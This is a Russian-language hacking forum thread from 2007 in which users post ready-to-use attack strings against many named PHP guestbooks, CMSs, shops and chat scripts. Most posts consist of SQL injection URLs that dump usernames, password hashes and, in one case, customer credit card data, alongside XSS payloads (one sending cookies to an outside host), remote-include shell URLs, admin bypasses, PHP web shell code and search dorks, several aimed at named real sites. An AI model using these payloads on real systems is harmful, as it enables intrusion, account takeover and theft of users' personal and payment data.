editpost.php?forumid=1&post=3 UNION SELECT userid,login,password FROM cf_user INTO OUTFILE '/www/web/resultat.txt'%23&parent=1&p=1

CS-Forum 0.81
read.php?msg_result=[XSS]
/read.php?id=1'[SQL_SELECT]&debut=[SQL_LIMIT]
/index.php?search=%'[SQL_SELECT]%23
/index.php?debut=1[SQL]

Чаты:
Andys Chat 4.5
/register.PHP?action=[CMD-Script]



Talisman 03.03.2007 02:10

Гостевуха:
Sad Raven Guest Book:
в поле HTTP_X_FORWARDED_FOR вставляем
Код HTML:

67.22.83.13><script>img = new Image();img.src = "http://test1.ru/s.php?out="+document.cookie;</script><!-- XSS --
и постим сообщение, более подробно тут: тут
тут ВИДЕО

Lesnoy_chelovek 03.03.2007 12:55

D3Jeeb:
http://www.target.com/fastlinks.php?catid=[SQL]
http://www.target.com/catogary.php?catid=[SQL]

Dating Agent PRO:
http://target.xx/picture.php?pid=1[SQL]
http://target.xx/mem.php?mid=1[SQL]
http://target.xx/search.php?search=3&sex=1[SQL]

dating biz@ dating script:
http://www.example.com/user_view.php?u=<iframe%20src=http://ha.ckers.org/scriptlet.html>

Dawaween:
http://www.target.com/poems/poems.php?division=diwan&action=view&offset=25&id=[sql]

DCP-Portal 6.1.х:
http://example/[dp_path]/library/lib.php?root=[cmd_url]

Dev web management system 1.5:
http://[цель]/[путь]/download_now.php?target=9999999999999[SQL]
http://[target]/[path]/add.php?language[ENTER_ARTICLE_TITLE]=");}}--></script><script>alert(document.cookie)</script>
http://[target]/[path]/add.php?language[SPECIFY_ZONE]=");}}--></script><script>alert(document.cookie)</script>
http://[target]/[path]/add.php?language[ENTER_ARTICLE_HEADER]=");}}--></script><script>alert(document.cookie)</script>
http://[target]/[path]/add.php?language[ENTER_ARTICLE_BODY]=");}}--></script><script>alert(document.cookie)</script>

DirectContact 0.3b:
http://[host]:[port]/..\..\..\..\windows/system.ini

dotProject 2.0.1:
1) /includes/db_adodb.php?baseDir=[REMOTE INCLUDE]
2) /includes/db_connect.php?baseDir=[REMOTE INCLUDE]
3) /includes/session.php?baseDir=[REMOTE INCLUDE]
4) /modules/projects/gantt.php?dPconfig[root_dir]=[REMOTE INCLUDE]
5) /modules/projects/gantt2.php?dPconfig[root_dir]=[REMOTE INCLUDE]
6) /modules/projects/vw_files.php?dPconfig[root_dir]=[REMOTE INCLUDE]
7) /modules/admin/vw_usr_roles.php?baseDir=[REMOTE INCLUDE]
8) /modules/public/calendar.php?baseDir=[REMOTE INCLUDE]
9) /modules/public/date_format.php?baseDir=[REMOTE INCLUDE]
10) /modules/tasks/gantt.php?baseDir=[REMOTE INCLUDE]

DVguestbook 1.0:
http://victim/path/dv_gbook.php?d=0&f='"><script>alert(document.cooki e)</script>
http://victim/path/dv_gbook.php?d=0&f='"><script>alert(/BiyoSecurityTeam/)</script>
http://victim/path/dv_gbook.php?d=0&f='"><script>alert(document.domai n)</script>

DVguestbook 1.2.2:
http://victim/path/index.php?page="><script>alert(document.cookie)</script>
http://victim/path/index.php?page="><script>alert(/Liz0ziM/)</script>
http://victim/path/index.php?page="><script>alert(document.domain)</script>

Alexsize 23.03.2007 12:11

От себя могу добавить парочку уязвимостей. Актуальны ОСОБЕННО для новичков. Так как очень просты. Актуальны и сейчас!

PHP-Nuke:

_http://www.example.com/nuke_path/iframe.php?file=ftp://user pass@evilsite.com/public_html/shell.html (or) .htm

_http://www.example.com/nuke_path/htmltonuke.php?filnavn=ftp://user pass@evilsite.com/public_html/shell.html (or) .htm

Grey 25.04.2007 15:06

Гостевые книги:

1. gBook 1.4 MySQL Beta

Можно попасть в админку минуя ввод логина и пароля:

http://site.ru/gb/index.php?login=true

--------------------

2. ScozBook BETA 1.1

Активные XSS:

При вводе сообщения в поля AIM и Web-Site Name вписываем скрипт (скрипт будет выполняться при просмотре сообщений).

--------------------

3. Tuchosoft guestbook v.0.2

Активные XSS:

При вводе сообщения в поля Name, email и Homepage вписываем скрипт (скрипт будет выполняться при просмотре сообщений).

--------------------

4. asn guestbook 1.5

1) Пасивная XSS:

Код:

http://site.ru/gb/footer.php?version=<script>alert();</script>
2) Имея доступ к админке, можно сделать SQL инъекцию (к примеру для вывода инфы из других таблиц (к примеру таблиц от движка сайта)):

Код:

http://site.ru/gb/gbadmin.php?act=detil&id=-1+union+select+1,2,3,4,5,6,7,8/*
--------------------

5. Sad Raven's Guestbook v1.1

Заливка шела:

В админке выбираем "Настройки":

http://site.ru/gb/admin.php?design

Здесь можно редактровать файлы header.inc.php и footer.inc.php.

К примеру редактируем файл footer.inc.php добавляя в него php код (к примеру <?php echo(123); ?>).

Теперь заходим по адресу:

http://site.ru/gb/design/footer.inc.php

и видим результат выполнения скрипта.

--------------------

6. Destinyd-Book 1.4

Пасивные XSS:

Код:

http://site.ru/gb/config/footer.php?copy=<script>alert();</script>
Код:

http://site.ru/gb/config/template.php?newname=<script>alert();</script>
--------------------

7. MLSOFT_quest 1.1

1) Активная XSS:

При вводе сообщения в поле e-mail вписываем скрипт (скрипт будет выполняться при просмотре сообщений).

2) SQL инъекция:

Код:

http://site.ru/gb/index.php?action=quest&next=-1+union+select+1,2,3,4,5,6,7,8/*
--------------------

8. SD GBook 1.0

Активная XSS:

При вводе сообщения в поле Город вписываем скрипт (скрипт будет выполняться при просмотре сообщений).

--------------------

9. XdN Guest Book 0.10

Пасивная XSS:

Код:

http://site.ru/inc_footer.php?fonts=<script>alert();</script>

Grey 26.04.2007 22:01

Новостные двиги:

1. WMNews Версия 0.2

Пасивная XSS:

Код:

http://site.ru/footer.php?site_title=<script>alert();</script>
--------------------

2. BGDev News 0.1

SQL инъекция:

Код:

http://site.ru/news_comments.php?id='+union+select+1,2,3,4,5,6,7,8,9/*
--------------------

3. Z-Breaknews 0.1

SQL инъекция:

Код:

http://site.ru/single.php?id=-1+union+select+1,2,3,4/*
http://site.ru/single.php?id=-1+union+select+1,convert(concat(database(),char(58),user(),char(58),version()),char),3,4/*

--------------------

4. OxyNews 0.4

SQL инъекция:

Код:

http://site.ru/index.php?oxynews_comment_id=-1+union+select+1,2,3,4,5,6,7,8/*
Вывод логина, пароля и мыла пользователя:

Код:

http://site.ru/index.php?oxynews_comment_id=-1+union+select+1,concat(username,char(58),password,char(58),email),3,4,5,6,7,8+from+oxynews_users/*
--------------------

5. NP v1.1.0

SQL инъекция:

Код:

http://site.ru/view.php?id=-1+union+select+1,2,3,4,5/*
http://site.ru/view.php?id=-1+union+select+convert(concat(database(),char(58),user(),char(58),version()),char),2,3,4,5/*

--------------------

6. Somery 0.4-105

Активная XSS:

При добавление комментария в поле name вписываем скрипт. Скрипт будет выполняться при просмотре комментариев.

freddi 26.04.2007 23:20

Amiro.CMS

Активная хсс в гостевой, уязвимы поля "Заголовок:" и
"Сообщение:"

Искать "Работает на: система управления сайтом Amiro CMS"

Grey 27.04.2007 20:05

Бесплатные движки инет-магазинов:

1. myInvoice 1

SQL инъекция:

Код:

http://site.ru/invoice.php?id='+union+select+1,2,3,4,5,6/*
Вывод номера, логина, хеша пароля (mysql4) и мыла пользователя:

Код:

http://site.ru/invoice.php?id='+union+select+1,2,3,convert(concat(clientid,char(58),name,char(58),password,char(58),email),char),5,6+from+clients/*
--------------------

2. Shop-Script Free

SQL инъекция:

Код:

http://site.ru/index.php?CID=-1+union+select+1,2/*
http://site.ru/index.php?CID=-1+union+select+1,convert(concat(database(),char(58),user(),char(58),version()),char)/*

--------------------

3. Pricelistme! 1

SQL инъекция:

Код:

http://site.ru/one_index_product.php?loginis=-1+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17/*
http://site.ru/one_index_product.php?loginis=-1+union+select+1,convert(concat(database(),char(58),user(),char(58),version()),char),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17/*

---------------------------------------------------
---------------------------------------------------

Календари и органайзеры:

1. Geo-Contacts 1.1

SQL инъекция:

Код:

http://site.ru/view.php?id=-1+union+select+1,2,3,4,5,6,7,8,9,10,11,12/*
http://site.ru/view.php?id=-1+union+select+1,2,3,convert(concat(database(),char(58),user(),char(58),version()),char),5,6,7,8,9,10,11,12/*

2. phpAbook 0.8.5b

Пассивная XSS:

Код:

http://site.ru/include/inc.footer.php?abook_vers=<script>alert();</script>
3. php-addressbook v1.2

SQL инъекция:

Код:

http://site.ru/view.php?id=-1+union+select+1,2,3,convert(concat(database(),char(58),user(),char(58),version()),char),5,6,7,8,9,10,11,12/*
---------------------------------------------------
---------------------------------------------------


Игры:

1. 100 Question Simple Trivia Script 1

SQL инъекция:

Код:

http://site.ru/trivia.php?trivia_id=-1+union+select+1,2,3,4,5/*
http://site.ru/trivia.php?trivia_id=-1+union+select+1,convert(concat(database(),char(58),user(),char(58),version()),char),3,4,5/*


Grey 30.04.2007 21:18

Гостевые книги:

1. EzGuestBook 1.1

1) Активные XSS:

При создание сообщения в поля Name, E-Mail, Message вписываем скрипт, скрипт будет выполняться при просмотре сообщений, в том чиле и в админке.

2) SQL инъекция:

Код:

http://site.ru/guestbook.php?action=sort&by=name&from='+union+select+1,2,3,4,5/*
Вывод логина и пароля пользователя:

Код:

http://site.ru/guestbook.php?action=sort&by=name&from='+union+select+concat(login,char(58),password),2,3,4,5+from+ez_guestbook_auth/*
2. ChitChat 2.0

Активная XSS:

При создание сообщения в поле Website вписываем скрипт, скрипт будет выполняться при просмотре сообщений.

3. ParkerGuestbook v4.00 Add moderators

Из-за не корректного условия проверки логина и пароля, можно попасть в админку зная только логин или только пароль.
Угадать логин проще - к примеру стандартный логин admin, его могут не поменять.

Доступ к админке, имя только логин:

http://site.ru/admin.php?adminlogin=grey&logged=1

Доступ к админке, имя только пароль:

http://site.ru/admin.php?adminpass=123&logged=1

4. ParkerGuestbook v2.00

Активные XSS:

При создание сообщения в поля Имя, Сайт, ICQ, Город вписываем скрипт, скрипт будет выполняться при просмотре сообщений.

Grey 01.05.2007 17:11

Гостевые книги:

1. NEOgeN GuestBook 1.2

1) Активная XSS:

При добавление сообщения в поле Ваше Имя вписываем скрипт, скрипт будет выполняться при просмотре сообщений.

2) Пасивная XSS:

Код:

http://site.ru/footer.php?GBookTitle=<script>alert();</script>
2. Php Trofimov guestbook v1.0

Активная XSS:

При добавление сообщения в поле Имя вписываем скрипт, скрипт будет выполняться при просмотре сообщений.

3. Trofimov book v1.0

Из-за отсутствия условия входа в админку, можно получить достп в админку:

http://site.ru/gb.php?action=admin

4. Rzhavin FAQ 1.0

1) Из-за не коректного условия входа в админку, можно получить частичный достп в админку:

http://site.ru/admin.php?showform=1

2) Активная XSS:

При добавление сообщения в поле Имя вписываем скрипт, скрипт будет выполняться при просмотре сообщений.

5. spiderLog 1.0

Активные XSS:

При добавление сообщения в поля Name, E-mail Address, City, State / Province, Country вписываем скрипт, скрипт будет выполняться при просмотре сообщений.

6. Filebased Guestbook 1.0.1

Активные XSS:

При добавление сообщения в поля Name, Comment вписываем скрипт, скрипт будет выполняться при просмотре сообщений.

Grey 04.05.2007 18:40

Новостные двиги:

1. CuteNews rus v025

Пасивная XSS:

Код:

http://site.ru/example2.php?dosearch=yes&story="><script>alert();</script>
2. CuteNews.RU v.026

Активные XSS:

При добавление комментария в сообщение в поля Имя и Сообщение вписываем скрипт, скрипт будет выполняться при просмотре коментариев.

3. pagenews 1.0

1) SQL инъекция:

Код:

http://site.ru/insert.php?id='+union+select+1/*
http://site.ru/insert.php?id='+union+select+convert(database(),char)/*

2) Заливка шелла:

При загрузке файлов на сайт, расширение файла не проверяется.

Загружаются файлы в директрию uploads:

http://site.ru/uploads/shell.php

4. Sunny's Simple Diary

SQL инъекция:

Код:

http://site.ru/index.php?month='+union+select+1,2,3/*
http://localhost/1/index.php?month='+union+select+1,convert(version(),char),3/*

5. vNews v1.2

1) Свободный доступ в админку:

http://site.ru/newsadmin.php

2) Активная XSS:

При добавление новости в поле News вписываем скрипт.

3) SQL инъекция:

Код:

http://site.ru/newscontent.php?action=edit&id='+union+select+1,2,3/*
http://site.ru/newscontent.php?action=edit&id='+union+select+1,convert(version(),char),3/*


freddi 04.05.2007 23:06

Цитата:

Сообщение от Grey
5. Sad Raven's Guestbook v1.1

Можно попасть в админку минуя ввод логина и пароля:

http://site.ru/gb/admin.php?logined=1


А можно перейти по ссылке
www.сайт.ru/gb/passwd.dat
и перед нами будет:
<?php
$Password['логин'] = "хеш пароля";
?>

пример
http://www.ivanovo.ac.ru/win1251/fac_phys/admin.php


еще прикольная фишка там со знаком "|" попробуйте вставлять его в поля разные.

SkyMan 05.05.2007 13:12

e107 (какая версия не знаю, но не 7.8)
Этот текст можно вставлять в сообщение на форуме, в комментарий к новости, в личное сообщение.
[img]http://<путь к картинке>'onload=i=new/**/Image();i.src=unescape('%68%74%74...')+document.co okie;'[/img]
где %68%74%74... - закодированный путь к снифферу со знаком вопроса в конце.

+StArT+ 09.05.2007 04:37

На днях нашел. :)

BlaB! Lite 2.2
Скрипт для полноценного чата на PHP
Активная XSS:
.................................................. .......................
Уязвимость существует из-за недостаточной
обработки входных данных в поле "Nickname:"
в сценарии login.php:

В поле "Nickname:" пишем:
Код:

<SCRIPT>alert(document.cookie)</SCRIPT>

Входим,отправляем сообщение,видим знакомый алерт();! ;)
____________________________________

Подмена IP-адреса:
.................................................. .......................
В поле "Nickname:" пишем:

Код:

Желаемое имя:|:Ваше сообщение:|:Любой IP-адрес
Входим,отправляем сообщение
(содержание не важно!).

Таким образом в базу заносится не ваш IP-адрес,
а тот который вы указали!

Пример:

http://zeus.aegee.org/cdstuff/chat
_____________________________________
*********************************

Grey 13.05.2007 18:48

Скрипт знакомств:

Интим-услуги Nevius

1) Пасивная XSS:

Код:

http://site.ru/list.php?g=<script>alert();</script>
2) SQL инъекция:

Код:

http://site.ru/list.php?g=&link=-1+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,23,24,25,26,27,28,29,30,31,32,33,34,35,36/*
Вывод логина и пароля пользователя:

Код:

http://site.ru/list.php?g=&link=-1+union+select+1,concat(login,char(58),pass),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,23,24,25,26,27,28,29,30,31,32,33,34,35,36+from+users/*

Grey 29.05.2007 18:53

PHP Advanced Transfer Manager Full version: 1.30

Скрипт очень дырявый, в нём еще локальный инклуд файлов находили:

http://forum.antichat.ru/showpost.ph...62&postcount=8

а вот про xss вроде не было:

Пасивные XSS:

viewers/txt.php

Код:

http://site.ru/viewers/txt.php?filename=<script>alert();</script>
http://site.ru/viewers/txt.php?current_dir=<script>alert();</script>

viewers/jpg.php

Код:

http://site.ru/viewers/jpg.php?filename="><script>alert();</script>
http://site.ru/viewers/jpg.php?directory="><script>alert();</script>

viewers/jpeg.php

Код:

http://site.ru/viewers/jpeg.php?filename="><script>alert();</script>
http://site.ru/viewers/jpeg.php?directory="><script>alert();</script>

viewers/gif.php

Код:

http://site.ru/viewers/gif.php?filename="><script>alert();</script>
http://site.ru/viewers/gif.php?directory="><script>alert();</script>

viewers/bmp.php

Код:

http://site.ru/viewers/bmp.php?filename="><script>alert();</script>
http://site.ru/viewers/bmp.php?directory="><script>alert();</script>

viewers/png.php

Код:

http://site.ru/viewers/png.php?filename="><script>alert();</script>
http://site.ru/viewers/png.php?directory="><script>alert();</script>

viewers/swf.php

Код:

http://site.ru/viewers/swf.php?filename="><script>alert();</script>
http://site.ru/viewers/swf.php?directory="><script>alert();</script>

viewers/mov.php

Код:

http://site.ru/viewers/mov.php?filename="><script>alert();</script>
http://site.ru/viewers/mov.php?current_dir="><script>alert();</script>

viewers/tif.php

Код:

http://site.ru/viewers/tif.php?filename="><script>alert();</script>
http://site.ru/viewers/tif.php?directory="><script>alert();</script>

Заливка шелла:
------------------

В админке заходим в конфигурацию (Admin: Configure Upload Center)

Там можно редактивровать файлы:

footer.htm
header.htm
info.htm
mailinfo.htm

В любой из них вписываем шелл.
Главное что бы файлы с расширением .htm выполнялись как php.

Lesnoy_chelovek 29.05.2007 22:28

В своё время начал собирать уязвимости для себя. В общем, кому надо забирайте - _http://slil.ru/24435960.

NOmeR1 02.06.2007 23:41

siteframe SQL inj
http://site/user.php?id=-1+union+select+1,2,3,4,concat(VERSION(),0x3a,DATAB ASE(),0x3a,USER())/*
Скромно, но полезно :)

Grey 04.06.2007 21:20

WR-Guest 1.0

Активная XSS:

При добавление сообщения в поле Имя вписываем скрипт, скрипт будет выполняться при просмотре соообщений.

Dagon 06.06.2007 16:22

SimPoll v.1.0

Активная XSS:

админка управления опросами обычно открыта (файл test_poll_admin.php) в помощью админки можно изменить текущий опрос. при введении текста опроса данные не фильтруются. возможна вставка своего ява-скрипта

google dork: inurl:test_poll_results.php

dmnt 07.06.2007 17:40

cartkeeper

SQL-inj

hxxp://ckgold.cartkeeper.com/item.php?item_id=-1&category_id=27+group+by+tbl_item.item_id+union+s elect+1,version(),3,user()/*

Grey 09.06.2007 22:40

Скрипты статистики посещений:

1. Сервер статистики ГелиоСтат

Активная XSS:

В переменной $HTTP_REFERER значения не фильтруются, вписанный в реферер, скрипт будет выполнятся при просмотре статистики.

2. pronuserinfoSQL v1.2

Активная XSS:

В переменной $HTTP_REFERER значения не фильтруются, вписанный в реферер, скрипт будет выполнятся при просмотре статистики.

SQL инъекция:

На странице view.php в поле "отследить последних..." вводим:

' union select 1,2,3,4,5,6/*

3. SEbotInfo 2.0

Активная XSS:

На странице в sebot.php переменные:

HTTP_USER_AGENT вписываем Yandex.

HTTP_HOST вписываем тело скрипта.

Скрипт будет выполняться при просмотре статистики на странице sebotinfo.php.

4. BotsInfo v0.03

Активная XSS:

На странице в write.php переменные:

HTTP_USER_AGENT вписываем Yandex.

HTTP_HOST вписываем тело скрипта.

Скрипт будет выполняться при просмотре статистики на странице botsinfo.php.

Grey 15.06.2007 14:18

EJ3 TOP 1.4

Заливка шелла:

При добавление ссылки на сайт в поле Banner URL вводим:

'; ?> <?php Код шелла ?> <?php $a='

После ввода данных получаем ID:

К примеру: 1181902021

Шелл будет доступен по адресу:

http://site.ru/data/1181902021info.php

http://site.ru/data/[id]info.php

-----------------------------------------------------------

Ссылки и каталоги ссылок

1. Link Database

SQL инъекция:

http://site.ru/links.php?category=-1+union+select+1,2,3,4,5,6/*

2. Link Up

SQL инъекция:

http://site.ru/category.php?category=-1+union+select+1,2/*

Доступ в админку:

http://site.ru/admin/index.php

В поле Username вводим:
' or 1=1 /*

3. SM(links) v2.0

Отсутствие .htaccess:

Смотрим файл config.inc - в нём хранятся логин и пароль к админке:

http://site.ru/config.inc

4. xLink v2.1

Пассивная XSS:

http://site.ru/poisk.php?poisk='><script>alert();</script>

5. My Link 1.00

Активная XSS:

При добавление ссылки в поле Имя ссылки или Описание ссылки вводим скприпт, скрипт будет выполняться при просмотре ссылок.

6. Quick Link

Активная XSS:

При добавление категории (Add Category) вводим скрипт, скрипт будет выполняться при просмотре ссылок.

_Pantera_ 20.06.2007 16:54

scozbook 1.1
Код:

http://site.ru/admin/edit.php?id=-2'+union+select+1,convert(concat(adminname,char(58),adminpass,char(58),adminemail)+using+cp1251),3,4,5,6,7,8,9,10+from+scozbook_admin+limit+0,1/*

Grey 26.06.2007 19:52

Гостевые книги:

FastStarter

Активная XSS:

Вписываем скрипт в поле name.

Mandralivre 4.1

Активные XSS:

Вписываем скрипт в поля Votre nom, Votre email, Votre site web.

hwdeGUEST 2.0

Активная XSS:

Вписываем скрипт в поле Name.

_Pantera_ 28.06.2007 02:27

Закрытая гостевая книга v 1.0 (websmith)

вход в админку без пароля
Код:

www.site.ru/admin/index.php
гостевуха стоит 20 баксов, а в демке нехватаит возможности изменения данных. Вполне возможно что в полной версии можно встретить XSS
_________________

guest v1.1

если криво настроены права то можно прочитать файл с логином и паролем
Код:

www.site.ru/passwd.dat
все это дело выглядит след образом
PHP код:

<?php
$Password
['admin'] = "d8578edf8458ce06fbc5bb76a58c5ca4";
?>

логин - admin
пароль(мд5) - d8578edf8458ce06fbc5bb76a58c5ca4

заливка шелла выполняеться из админ панели
Код:

http://site.ru/admin.php?design
в поле файла header.inc.php вписываем
PHP код:

<?php system($_GET[cmd]); ?>

и выполняем
Код:

http://site.ru/design/header.inc.php?cmd=команда

NOmeR1 03.07.2007 23:59

немного PHP-inj.

PHP::HTML 0.6.4 (PHP-inj)
phphtml.php?htmlclass_path=[url]

Media Gallery 1.4.8a (PHP-inj)
mediagallery/public_html/maint/ftpmedia.php?_MG_CONF[path_html]=[file]

YAAP 1.5 (PHP-inj)
includes/common.php?root_path=[file]

NagiosQL 2.00-P00 (PHP-inj)
functions/prepend_adm.php?SETS[path][physical]=[file]

Grey 12.07.2007 13:16

AMGuests0.3.0

1) Локальный инклуд файлов.

Требуется:

register_globals = On
magic_quotes = Off

Код:

http://site.ru/gb/signin.php?sent=1&AMG_serverpath=FILE%00
2) Пассивные XSS.

Требуется:

register_globals = On

Код:

http://site.ru/gb/signin.php?AMG_signin_name="><script>alert(1);</script>
http://site.ru/gb/signin.php?AMG_signin_location="><script>alert(1);</script>
http://site.ru/gb/signin.php?AMG_signin_icq="><script>alert(1);</script>
http://site.ru/gb/signin.php?AMG_signin_email="><script>alert(1);</script>
http://site.ru/gb/signin.php?AMG_currentlanguage[signin_form_userimage]="><script>alert(1);</script>


Ni0x 12.07.2007 13:50

Virtual War v1.5.0 or low
XSS и SQL-INJ
Цитата:

http://[host]/vwar/war.php?s=[SQL]
http://[host]/vwar/war.php?page=[SQL]or[XSS]
http://[host]/vwar/war.php?showgame=[SQL]
http://[host]/vwar/war.php?sortby=[SQL]
http://[host]/vwar/war.php?sortorder=[SQL]
http://[host]/vwar/calendar.php?year=[XSS]
http://[host]/vwar/calendar.php?month=[SQL] & [XSS]
зы: Powered by: Virtual War v1.5.0

n0ne 19.07.2007 18:15

SQL-inj в QuickEstore
 
Существует возможность провести sql-инъекцию из-за недостаточной обработки входных данных в параметре CFTOKEN в скрипте insertorder.cfm.

Пример:

Цитата:

http://www.appointmentsatfive.com/insertorder.cfm?CFID=6060&CFTOKEN=88477579+union+s elect+1,2,3,ccnum,ccname,6,7,8,9,10,11,12,13,cctyp e,ccexpires,16,17,18,19+from+customers/*
Кол-во полей везде разное, но в основном от 15 до 19.

Есть и cvv, но он в таблице PARAMS и есть почему-то не везде, но можно вывести его и через последние заказы.

Вот всё остальное (после TABLE таблица, ниже колонки в ней):

Цитата:

TABLE [Attributes]
[AttributeNum]
[Attribute]
[AttValues]


TABLE [Categories]
[CategoryID]
[Category]
[CatPic]


TABLE [Customers]
[CustID]
[CustFName]
[CustLName]
[CustPhone]
[CustEMail]
[CustAddress1]
[CustAddress2]
[CustCity]
[CustState]
[CustZip]
[CustCountry]
[LastOrderID]
[LastOrderDate]
[LastOrderAmt]
[CCName]
[CCType]
[CCNum]
[CCExpires]
[CustPWord]


TABLE [OrderHist]
[OrderNum]
[CustID]
[ItemID]
[SKU]
[Quantity]
[ItemTotal]
[TotItemWeight]
[Att1]
[Att2]
[Status]


TABLE [Orders]
[OrderID]
[ItemID]
[Quantity]
[ItemTotal]
[TotItemWeight]
[Expires]
[Att1]
[Att2]


TABLE [OrdHistDetail]
[OrderNum]
[CustID]
[GrandTotal]
[Shipping]
[SalesTax]
[OrderDate]
[CustEMail]
[Notes]
[ShipDate]
[ShipMethod]
[ShipName]
[ShipAddress]
[ShipCity]
[ShipState]
[ShipZip]
[upsize_ts]
[AddressStatus]

TABLE [Params]
[storename]
[template]
[password]
[processor]
[partner]
[vendor]
[loginid]
[paypassword]
[certpath]
[type]
[ccards]
[testmode]
[inv_description]
[store_path]
[store_url]
[secure_url]
[order_path]
[order_url]
[orderaction]
[notifyemail]
[db]
[graphic]
[shipmethod]
[selfservice]
[offerpaypal]
[paypalonly]
[ppec]
[cffileenabled]
[csistorename]
[storefax]
[storeaddy]
[storecity]
[storestate]
[storezip]
[avs]
[cvv]
[PPEC_API_UserName]
[PPEC_API_Password]
[PPEC_API_Signature]


TABLE [ProdPics]
[ItemID]
[ItemPic]
[Thumbnail]


TABLE [Products]
[ItemID]
[SKU]
[ItemName]
[CategoryID]
[SubCatID]
[Description]
[Price]
[MSRP]
[DiscAmt]
[DiscIsPct]
[DiscTrigger]
[Weight]
[A1]
[A1Vals]
[A2]
[A2Vals]
[Units]
[Layout]
[Qty_In_Stock]
[Safety_Stock]
[Taxable]
[Shipable]
[Show_Inventory]
[New] [bit]


TABLE [SalesTax]
[State]
[Rate]


TABLE [ShipOptions]
[OptID]
[Option_]
[OptRate]


TABLE [Shipping]
[shiplimit]
[shipfee]


TABLE [SubCats]
[SubCatID]
[SubCat]
[TopCatID]


TABLE [States]
[State]
[Abbreviation]


TABLE [Categories]
[PK_Categories]
[CategoryID]


TABLE [Customers]
[PK_Customers]
[CustID]


TABLE [ProdPics]
[PK_ProdPics]
[ItemID]


TABLE [Products]
[DF_Products_Taxable]
[Taxable]
[DF_Products_Shipable]
[Shipable],
[PK_Products]
[ItemID]

На счет версии не знаю, но в гугле на запрос
Цитата:

inurl:"insertorder.cfm"
каждая вторая уязвима.



P.S.: Вроде ничё не забыл :)

n0ne 07.08.2007 21:34

Раскрытие пути в ARTEShok CMS:

Цитата:

http://www.paratech.ru/main.phtml?cid[]=5010072
^^^ их оф.сайт ^^^

Dr.Frank 28.08.2007 12:37

SQL-инъекция в CMS Koobi
 
CMS Koobi v4.2 v5.8 v6.1 со страницей скачки файлов
возможно другие версии(тестировал только на этих)

http://site/index.php?area=1&p=downloads&categ=-1+union+select+1,concat(email,0x3a,pass),3+from+table_name/*

Наиболее вероятные зачения table_name:
Код:

koobi4_user
kpro_user
kpro5_user
kpro6_user

для авторизации нужны email и пароль

Пароль - дважды хэшированный md5: md5(md5($pass))

Grey 15.09.2007 11:03

Open Guestbook 0.5

Скачать можно здесь:

http://sourceforge.net/project/showf...group_id=82463

1) Пассивная XSS

Код:

http://localhost/header.php?title=</title><script>alert(123);</script>
2) SQL инъекция/активная XSS

В скрипте process.php из-за отсутсвия фильтрации можно провести инъекцию в запросе INSERT...

При добавление сообщения в поле Message вводим:

Код:

','','','', '', '', '', '', '', '><script>alert(111);</script>', '', '', '')/*
В результате получим выполнение нашего скрипта при просмотре сообщений, т.е. получаем активную xss.

phol1eadeux 03.11.2007 04:02

artCifra CMS v4.5
Уязвимость в cookie. Имя куки artcifraSES. Возможность проведения SQL инъекции.
Пример:
Изменяем содержимое куки на:
Код:

')+union+select+column1,column2+from+some_table

Scipio 15.11.2007 04:39

CONTENTdm

Пассивные XSS:

1) в скрипте results.php уязвимы переменная CISOBOX1, CISOBOX2 и т.д.

кстати найдена мной 05.07.2007

а в багтраках появилась только 06.08.2007, так что если и баян, то свой, так сказать для полноты сюда запостил

2) во многих скриптах в переменной CISOROOT
примеры:
Код:

http://contentdm.nitle.org/cdm4/item_viewer.php?CISOROOT=%3Cscript%3Ealert(document.cookie);%3C/script%3E
Код:

http://mdc.cbuc.cat/cdm4/document.php?CISOROOT=%3Cscript%3Ealert(document.cookie);%3C/script%3E

Ky3bMu4 19.11.2007 19:03

A-Shop
Версии: 4.4.1(возможно и более ранние) - 4.7.х(last)

SQL-инъекция с доступом в user и с незашифренными пасами.

Уязвимость в catalogue.php , переменная cat, фильтрации никакой нет. Колличество столбцов 33,32 или 2.

Пример:
Код:

http://www.the123d.com/shop/catalogue.php?cat=-21+union+select+1,username,3,4,password,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32+from+user/*

Админка:
http://www.the123d.com/shop/admin/login.php


Отправил на video@antichat.ru должны скоро выложить.


Время: 16:09